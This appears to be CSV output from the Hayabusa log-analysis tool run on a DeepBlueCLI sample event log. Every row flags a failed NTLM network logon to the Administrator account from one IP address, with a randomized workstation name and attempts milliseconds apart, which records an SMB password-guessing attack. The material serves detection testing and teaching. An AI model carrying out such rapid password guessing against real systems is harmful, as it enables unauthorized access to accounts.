2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
